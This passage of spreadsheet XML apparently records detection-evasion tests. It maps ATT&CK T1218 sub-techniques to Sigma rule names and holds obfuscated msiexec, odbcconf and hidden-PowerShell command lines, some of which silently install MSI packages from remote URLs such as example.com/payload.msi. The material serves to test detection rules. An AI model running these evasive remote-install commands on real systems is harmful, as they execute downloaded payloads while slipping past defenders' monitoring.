      <c r="A1851" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B1851" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_dll</t>
        </is>
      </c>
      <c r="C1851" s="36" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE</t>
        </is>
      </c>
      <c r="D1851" s="36" t="inlineStr">
        <is>
          <t>84f52741-8834-4a8c-a413-2eb2269aa6c8</t>
        </is>
      </c>
      <c r="E1851" s="36" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /z "C:\AtomicRedTeam\atomics\T1218.007_x0008_in\MSIRunner.dl""l"</t>
        </is>
      </c>
      <c r="F1851" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1851" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1851" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1851" s="43" t="n"/>
      <c r="J1851" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1851" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1852" ht="15.75" customHeight="1" s="42">
      <c r="A1852" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B1852" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_execute_dll</t>
        </is>
      </c>
      <c r="C1852" s="36" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL</t>
        </is>
      </c>
      <c r="D1852" s="36" t="inlineStr">
        <is>
          <t>6f4191bb-912b-48a8-9ce7-682769541e6d</t>
        </is>
      </c>
      <c r="E1852" s="36" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe  /y "C:\AtomicRedTeam\atomics\T1218.007_x0008_in\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F1852" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1852" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1852" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1852" s="43" t="n"/>
      <c r="J1852" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1852" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1853" ht="15.75" customHeight="1" s="42">
      <c r="A1853" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B1853" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_execute_dll</t>
        </is>
      </c>
      <c r="C1853" s="36" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL</t>
        </is>
      </c>
      <c r="D1853" s="36" t="inlineStr">
        <is>
          <t>6f4191bb-912b-48a8-9ce7-682769541e6d</t>
        </is>
      </c>
      <c r="E1853" s="36" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe "/y" "C:\AtomicRedTeam\atomics\T1218.007_x0008_in\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F1853" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1853" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1853" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1853" s="43" t="n"/>
      <c r="J1853" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1853" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1854" ht="15.75" customHeight="1" s="42">
      <c r="A1854" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B1854" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_execute_dll</t>
        </is>
      </c>
      <c r="C1854" s="36" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL</t>
        </is>
      </c>
      <c r="D1854" s="36" t="inlineStr">
        <is>
          <t>6f4191bb-912b-48a8-9ce7-682769541e6d</t>
        </is>
      </c>
      <c r="E1854" s="36" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe -y "C:\Windows\CCM\..\..\AtomicRedTeam\atomics\T1218.007_x0008_in\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F1854" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1854" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1854" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1854" s="43" t="n"/>
      <c r="J1854" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1854" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1855" ht="15.75" customHeight="1" s="42">
      <c r="A1855" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B1855" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_quiet</t>
        </is>
      </c>
      <c r="C1855" s="36" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation</t>
        </is>
      </c>
      <c r="D1855" s="36" t="inlineStr">
        <is>
          <t>79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5</t>
        </is>
      </c>
      <c r="E1855" s="36" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /i "C:\AtomicRedTeam\atomics\T1218.007_x0008_in\T1218.007_DLL.msi" /quietn</t>
        </is>
      </c>
      <c r="F1855" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1855" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1855" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1855" s="43" t="n"/>
      <c r="J1855" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1855" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1856" ht="15.75" customHeight="1" s="42">
      <c r="A1856" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B1856" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_quiet</t>
        </is>
      </c>
      <c r="C1856" s="36" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation</t>
        </is>
      </c>
      <c r="D1856" s="36" t="inlineStr">
        <is>
          <t>79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5</t>
        </is>
      </c>
      <c r="E1856" s="43" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe "/q" "/i" "C:\AtomicRedTeam\atomics\T1218.007_x0008_in\T1218.007_DLL.msi"</t>
        </is>
      </c>
      <c r="F1856" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1856" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1856" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1856" s="43" t="n"/>
      <c r="J1856" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1856" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1857" ht="15.75" customHeight="1" s="42">
      <c r="A1857" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B1857" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_quiet</t>
        </is>
      </c>
      <c r="C1857" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation</t>
        </is>
      </c>
      <c r="D1857" s="43" t="inlineStr">
        <is>
          <t>79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5</t>
        </is>
      </c>
      <c r="E1857" s="43" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /i "C:\AtomicRedTeam\atomics\T1218.007_x0008_in\T1218.007_DLL.msi" /q""n</t>
        </is>
      </c>
      <c r="F1857" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1857" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1857" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1857" s="43" t="n"/>
      <c r="J1857" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1857" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1858" ht="15.75" customHeight="1" s="42">
      <c r="A1858" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B1858" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_remote</t>
        </is>
      </c>
      <c r="C1858" s="36" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Quiet Install From Remote Location</t>
        </is>
      </c>
      <c r="D1858" s="36" t="inlineStr">
        <is>
          <t>8150732a-0c9d-4a99-82b9-9efb9b90c40c</t>
        </is>
      </c>
      <c r="E1858" s="36" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /i "[https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi](https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi)" /quietn</t>
        </is>
      </c>
      <c r="F1858" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1858" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1858" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1858" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5); Suspicious Msiexec Quiet Install From Remote Location (8150732a-0c9d-4a99-82b9-9efb9b90c40c)</t>
        </is>
      </c>
      <c r="J1858" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1858" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1859" ht="15.75" customHeight="1" s="42">
      <c r="A1859" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B1859" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_remote</t>
        </is>
      </c>
      <c r="C1859" s="36" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Quiet Install From Remote Location</t>
        </is>
      </c>
      <c r="D1859" s="36" t="inlineStr">
        <is>
          <t>8150732a-0c9d-4a99-82b9-9efb9b90c40c</t>
        </is>
      </c>
      <c r="E1859" s="36" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe "/q" "/i" "[https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi](https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi)"</t>
        </is>
      </c>
      <c r="F1859" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1859" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1859" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1859" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5); Suspicious Msiexec Quiet Install From Remote Location (8150732a-0c9d-4a99-82b9-9efb9b90c40c)</t>
        </is>
      </c>
      <c r="J1859" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1859" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1860" ht="15.75" customHeight="1" s="42">
      <c r="A1860" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B1860" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_remote</t>
        </is>
      </c>
      <c r="C1860" s="36" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Quiet Install From Remote Location</t>
        </is>
      </c>
      <c r="D1860" s="36" t="inlineStr">
        <is>
          <t>8150732a-0c9d-4a99-82b9-9efb9b90c40c</t>
        </is>
      </c>
      <c r="E1860" s="36" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /q /i "h""ttps://[github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi](https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi)"</t>
        </is>
      </c>
      <c r="F1860" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1860" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1860" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1860" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5); Suspicious Msiexec Quiet Install From Remote Location (8150732a-0c9d-4a99-82b9-9efb9b90c40c)</t>
        </is>
      </c>
      <c r="J1860" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1860" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1861" ht="15.75" customHeight="1" s="42">
      <c r="A1861" s="43" t="n"/>
      <c r="B1861" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1861" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1861" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1861" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\temp\custom_host.exe &amp;&amp; C:\temp\custom_host.exe -W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1861" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1861" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1861" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1861" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM (7b6a7418-3afc-11f0-aff4-000d3abf478c); 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861" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1861" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1862" ht="15.75" customHeight="1" s="42">
      <c r="A1862" s="43" t="n"/>
      <c r="B1862" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1862" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1862" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1862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862" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1862" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1862" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1862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62" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1862" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1863" ht="15.75" customHeight="1" s="42">
      <c r="A1863" s="43" t="n"/>
      <c r="B1863" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1863" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1863" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1863" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc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863" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1863" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1863" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1863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63" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1863" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1864" ht="15.75" customHeight="1" s="42">
      <c r="A1864" s="43" t="n"/>
      <c r="B1864" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1864" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1864" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1864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864" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1864" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1864" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1864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64" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1864" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1865" ht="15.75" customHeight="1" s="42">
      <c r="A1865" s="43" t="n"/>
      <c r="B1865" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1865" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1865" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1865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865" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1865" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1865" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1865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65" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1865" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1866" ht="15.75" customHeight="1" s="42">
      <c r="A1866" s="43" t="n"/>
      <c r="B1866" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1866" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1866" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1866" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedcOmManD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1866" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1866" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1866" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1866" s="36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866" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1866" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1867" ht="15.75" customHeight="1" s="42">
      <c r="A1867" s="43" t="n"/>
      <c r="B1867" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1867" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1867" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1867" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -WindowStyle Hidden -Command "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F1867" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1867" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1867" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1867" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J1867" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1867" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1868" ht="15.75" customHeight="1" s="42">
      <c r="A1868" s="43" t="n"/>
      <c r="B1868" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1868" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1868" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1868" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -WIndoWStYle Hidden -c "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F1868" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1868" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1868" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1868" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J1868" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1868" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1869" ht="15.75" customHeight="1" s="42">
      <c r="A1869" s="43" t="n"/>
      <c r="B1869" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1869" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1869" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1869" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -wInDowsTyLe Hidden -COmMANd "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F1869" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1869" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1869" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1869" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J1869" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1869" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1870" ht="15.75" customHeight="1" s="42">
      <c r="A1870" s="43" t="n"/>
      <c r="B1870" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1870" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1870" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1870" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -WInDowSTYLE Hidden -cOmmaND "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F1870" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1870" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1870" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1870" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J1870" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1870" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1871" ht="15.75" customHeight="1" s="42">
      <c r="A1871" s="43" t="n"/>
      <c r="B1871" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1871" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1871" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1871" s="43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871" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1871" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1871" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1871" s="43" t="n"/>
      <c r="J1871" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1871" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1872" ht="15.75" customHeight="1" s="42">
      <c r="A1872" s="43" t="n"/>
      <c r="B1872" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1872" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1872" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1872" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -w hidden -C "$type=[type]::GetTypeFromProgID('WindowsInstaller.Installer'); $inst=[Activator]::CreateInstance($type); $inst.UILevel=2; $inst.InstallProduct('https://example.com/payload.msi', '')"</t>
        </is>
      </c>
      <c r="F1872" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1872" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1872" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1872" s="43" t="n"/>
      <c r="J1872" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1872" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1873" ht="15.75" customHeight="1" s="42">
      <c r="A1873" s="43" t="n"/>
      <c r="B1873" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1873" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1873" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1873" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -w hidden -Command "$type=[type]::GetTypeFromProgID('WindowsInstaller.Installer'); $inst=[Activator]::CreateInstance($type); $inst.UILevel=2; $inst.InstallProduct('https://example.com/payload.msi', '')"</t>
        </is>
      </c>
      <c r="F1873" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1873" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1873" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1873" s="43" t="n"/>
      <c r="J1873" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1873" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1874" ht="15.75" customHeight="1" s="42">
      <c r="A1874" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B1874" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr</t>
        </is>
      </c>
      <c r="C1874" s="36" t="inlineStr">
        <is>
          <t>New DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D1874" s="36" t="inlineStr">
        <is>
          <t>9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70</t>
        </is>
      </c>
      <c r="E1874" s="36" t="inlineStr">
        <is>
          <t>odbcconf.exe /S /A {REGSVR  "C:\AtomicRedTeam\atomics\T1218.008\src\Win32\T1218-2.dll"}</t>
        </is>
      </c>
      <c r="F1874" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1874" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1874" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1874" s="43" t="inlineStr">
        <is>
          <t>New DLL Registered Via Odbcconf.EXE (9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70)</t>
        </is>
      </c>
      <c r="J1874" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1874" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1875" ht="15.75" customHeight="1" s="42">
      <c r="A1875" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B1875" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr</t>
        </is>
      </c>
      <c r="C1875" s="36" t="inlineStr">
        <is>
          <t>New DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D1875" s="36" t="inlineStr">
        <is>
          <t>9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70</t>
        </is>
      </c>
      <c r="E1875" s="36" t="inlineStr">
        <is>
          <t>odbcconf.exe /S /A {REGSVR "C:\AtomicRedTeam\atomics\T1218.008\src\Win32\T1218-2.dl""l"}</t>
        </is>
      </c>
      <c r="F1875" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1875" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1875" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1875" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious DLL Registered Via Odbcconf.EXE (ba4cfc11-d0fa-4d94-bf20-7c332c412e76)</t>
        </is>
      </c>
      <c r="J1875" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1875" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1876" ht="15.75" customHeight="1" s="42">
      <c r="A1876" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B1876" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr</t>
        </is>
      </c>
      <c r="C1876" s="36" t="inlineStr">
        <is>
          <t>New DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D1876" s="36" t="inlineStr">
        <is>
          <t>9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70</t>
        </is>
      </c>
      <c r="E1876" s="36" t="inlineStr">
        <is>
          <t>odbcconf.exe /S /A {"REGSVR" "C:\AtomicRedTeam\atomics\T1218.008\src\Win32\T1218-2.dll"}</t>
        </is>
      </c>
      <c r="F1876" s="36" t="b">
        <v>1</v>
      </c>
